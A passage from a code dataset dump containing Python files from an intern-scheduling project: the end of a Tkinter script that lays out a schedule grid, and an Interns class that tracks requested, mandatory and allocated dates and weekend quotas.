df_req.iterrows()]\r\n\r\nallocate_mandatory(list_of_interns)\r\n\r\ncreate_intern_list_for_each_day(list_of_interns)\r\nsol = []\r\n\r\n\r\nroot_sched = Tk()\r\nroot_sched.title('Schedule')\r\ncolumn_labels = ['Day', 'intern_01', 'intern_02', 'intern_03', 'intern_04', 'intern_05']\r\nfor i in range(len(column_labels)):\r\n column_label = Label(root_sched, text = column_labels[i]).grid(row = 1, column = i)\r\nfor i in range(len(list_of_days)):\r\n row_label = Label(root_sched, text = list_of_days[i].get_day()).grid(row = i + 2, column = 0)\r\n for j in range(len(list_of_days[i].get_allocated_interns())):\r\n name = Label(root_sched, text = list_of_days[i].get_allocated_interns()[j].get_name()).grid(row = i + 2, column = j + 1)\r\n # available_interns = list_of_days[i].get_available_interns()\r\n # available_interns_str = available_interns[0].get_name()\r\n # if len(available_interns) > 1:\r\n # for k in range(1, len(available_interns)):\r\n # available_interns_str += ', '\r\n # available_interns_str += available_interns[k].get_name()\r\n # available_interns = Label(root_sched, text = available_interns_str).grid(row = i + 1, column = 6)\r\n\r\nmy_button = Button(root_sched, text='Allocate', command = allocate_proficient_intern).grid(row=0)\r\n\r\n\r\nroot_sched.mainloop()\r\nschedule(list_of_days, 0, 0, 0, sol)\r\n\r\n\r\n\r\n# print(len(sol))\r\n# print(sol[0])" }, { "alpha_fraction": 0.5854895710945129, "alphanum_fraction": 0.5920852422714233, "avg_line_length": 27.893939971923828, "blob_id": "49e879aa1be1cbf68f2fdebf4b0a37a9ba6aceba", "content_id": "054aa18dccd74c79efb146c062f7b57bc9b26e0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1971, "license_type": "no_license", "max_line_length": 99, "num_lines": 66, "path": "/interns.py", "repo_name": "raphaellieber/schedule", "src_encoding": "UTF-8", "text": "class Interns:\r\n def __init__(self, name, proficiency, nr_asked, pos_dates, req_dates, mand_dates, nr_weekends):\r\n self.__name = name\r\n self.__proficiency = proficiency\r\n self.__nr_asked = nr_asked\r\n self.__dates_possible = pos_dates\r\n self.__dates_requested = req_dates\r\n self.__dates_mandatory = mand_dates\r\n self.__nr_required_weekends = nr_weekends[0]\r\n self.__nr_permitted_weekends = nr_weekends[1]\r\n self.__dates_allocated = []\r\n self.__nr_allocated = 0\r\n self.__available = True\r\n self.__score = 0\r\n\r\n def get_name(self):\r\n return self.__name\r\n\r\n def get_proficiency(self):\r\n return self.__proficiency\r\n\r\n def get_nr_asked(self):\r\n return self.__nr_asked\r\n\r\n def get_possible_dates(self):\r\n return self.__dates_possible\r\n\r\n def get_requested_dates(self):\r\n return self.__dates_requested\r\n\r\n def get_mandatory_dates(self):\r\n return self.__dates_mandatory\r\n\r\n def get_allocated_dates(self):\r\n return self.__dates_allocated\r\n\r\n def get_nr_required_weekend_days(self):\r\n return self.__nr_required_weekends\r\n\r\n def get_nr_allocated(self):\r\n return self.__nr_allocated\r\n\r\n def get_score(self):\r\n return self.__score\r\n\r\n def allocate(self, date):\r\n self.__dates_allocated.append(date)\r\n self.__nr_allocated += 1\r\n\r\n def remove_last_allocation(self):\r\n del self.__dates_allocated[-1]\r\n self.__nr_allocated -= 1\r\n\r\n def weekend_allocated(self):\r\n self.__nr_required_weekends -= 1\r\n self.__nr_permitted_weekends -= 1\r\n\r\n def removed_weekend_allocation(self):\r\n self.__nr_required_weekends += 1\r\n self.__nr_permitted_weekends += 1\r\n\r\n def weekend_allocation_required(self):\r\n return self.__nr_required_weekends > 0\r\n\r\n def weekend_allocation_permitted(self):\r\n return self.__nr_permitted_weekends > 0" } ]
3